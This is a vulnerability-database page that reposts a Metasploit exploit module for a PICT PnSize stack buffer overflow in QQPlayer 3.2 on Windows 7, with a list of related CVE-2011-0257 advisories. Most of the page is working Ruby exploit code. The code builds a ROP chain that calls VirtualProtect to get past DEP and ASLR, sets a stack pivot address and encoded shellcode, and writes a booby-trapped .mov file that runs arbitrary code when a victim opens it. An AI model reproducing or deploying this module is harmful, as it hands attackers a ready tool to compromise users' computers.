QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS

🗓️ 21 Nov 2011 00:00:00Reported by RootType

QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPAS

Reporter	Title	Published	Views	Family All 26
0day.today	Apple QuickTime PICT PnSize Buffer Overflow	3 Sep 201100:00	–	zdt
0day.today	QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS	20 Nov 201100:00	–	zdt
Circl	CVE-2011-0257	3 Sep 201100:00	–	circl
Check Point Advisories	Apple QuickTime PICT Image PnSize Opcode Stack Buffer Overflow (CVE-2011-0257)	1 Nov 201100:00	–	checkpoint_advisories
CVE	CVE-2011-0257	15 Aug 201121:00	–	cve
Cvelist	CVE-2011-0257	15 Aug 201121:00	–	cvelist
Exploit DB	Apple QuickTime - PICT PnSize Buffer Overflow (Metasploit)	3 Sep 201100:00	–	exploitdb
Exploit DB	QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows (ASLR + DEP Bypass) (Metasploit)	21 Nov 201100:00	–	exploitdb
Tenable Nessus	QuickTime < 7.7 Multiple Vulnerabilities (Mac OS X)	4 Aug 201100:00	–	nessus
Tenable Nessus	QuickTime < 7.7 Multiple Vulnerabilities (Windows)	4 Aug 201100:00	–	nessus


                                                # Exploit Title: QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS
# Date: 2011,11,21
# Author: hellok
# Software Link: http://dl_dir.qq.com/invc/qqplayer/QQPlayer_Setup_32_845.exe
# Version: 32_845(lastest)
# Tested on: WIN7
require 'msf/core'
class Metasploit3 &lt; Msf::Exploit::Remote
    include Msf::Exploit::FILEFORMAT
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           =&gt; 'QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS',
            'Description'    =&gt; %q{
                    This module exploits a vulnerability in QQPLAYER Player 3.2.
                When opening a .mov file containing a specially crafted PnSize value, an attacker
                may be able to execute arbitrary code.
            },
            'License'        =&gt; MSF_LICENSE,
            'Author'         =&gt;
                [
                    'hellok',  #special thank corelanc0d3r for 'mona'
                ],
            'References'     =&gt;
                [
                ],
            'DefaultOptions' =&gt;
                {
                    'EXITFUNC' =&gt; 'process',
                    'DisablePayloadHandler' =&gt; 'true',
                },
            'Payload'        =&gt;
                {
                    'Space'          =&gt; 750,
                    'BadChars'       =&gt; &quot;&quot;,  #Memcpy
                    'EncoderType'    =&gt; Msf::Encoder::Type::AlphanumUpper,
                    'DisableNops'    =&gt;  'True',
                    'PrependEncoder' =&gt; &quot;\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff&quot;,
                    'EncoderOptions' =&gt;
                        {
                            'BufferRegister' =&gt; 'ECX',
                        },
                },
            'Platform' =&gt; 'win',
            'Targets'        =&gt;
                [
                    [ 'Windows 7', { 'Ret' =&gt; 0x67664cde } ],
                ],
            'Privileged'     =&gt; false,
            'DisclosureDate' =&gt; '11 21 2011',
            'DefaultTarget'  =&gt; 0))
 
        register_options(
            [
                OptString.new('FILENAME',   [ false, 'The file name.',  'msf.mov' ]),
            ], self.class)
    end
    def exploit
        # !mona rop
        rop_gadgets =
        [
             
            0x00418007, # POP ECX # RETN (QQPlayer.exe)
            0x12345678,
            0x67664CE4,  
            0x01020304,
            0x10203040,
            0x22331122,
            0x23456789,
             
            0x00418007, # POP ECX # RETN (QQPlayer.exe)
            0x00a9c18c, # &lt;- *&amp;VirtualProtect()
            0x0054f100, # MOV EAX,DWORD PTR DS:[ECX] # RETN (QQPlayer.exe)
            #0x008e750c, LEA ESI,EAX # RETN (QQPlayer.exe)
            0x008cf099, # XCHG EAX,ESI # RETN
             
            0x6497aaad, # POP EBP # RETN (avformat-52.dll)
            0x100272bf, # ptr to 'call esp' (from i18nu.dll)
            0x005fc00b, # POP EBX # RETN (QQPlayer.exe)
            0x00000331, # &lt;- change size to mark as executable if needed (-&gt; ebx)
            0x00418007, # POP ECX # RETN (QQPlayer.exe)
            0x63d18000, # RW pointer (lpOldProtect) (-&gt; ecx)
            0x63d05001, # POP EDI # RETN (avutil-49.dll)
            0x63d05002, # ROP NOP (-&gt; edi)
            0x008bf00b, # POP EDX # RETN (QQPlayer.exe)
            0x00000040, # newProtect (0x40) (-&gt; edx)
            0x00468800, # POP EAX # RETN (QQPlayer.exe)
            0x90909090, # NOPS (-&gt; eax)
            0x008bad5c, # PUSHAD # RETN (QQPlayer.exe)
        # rop chain generated by mona.py
        # note : this chain may not work out of the box
        # you may have to change order or fix some gadgets,
        # but it should give you a head start
        ].pack(&quot;V*&quot;)
 
        stackpivot = [target.ret].pack('L')
 
        buffer =rand_text_alpha_upper(90)#2
        buffer &lt;&lt; rop_gadgets
        buffer &lt;&lt; payload.encoded
 
        junk = rand_text_alpha_upper(2306 - buffer.length)
 
        buffer &lt;&lt; junk
        buffer &lt;&lt; stackpivot
        buffer &lt;&lt; rand_text_alpha_upper(3000)#3000
 
        path = File.join( Msf::Config.install_root, &quot;data&quot;, &quot;exploits&quot;, &quot;CVE-2011-0257.mov&quot; )
        fd = File.open(path, &quot;rb&quot; )
        sploit = fd.read(fd.stat.size)
        fd.close
 
        sploit &lt;&lt; buffer
 
        file_create(sploit)
    end
end

21 Nov 2011 00:00Current

0.3Low risk

Vulners AI Score0.3

EPSS0.82963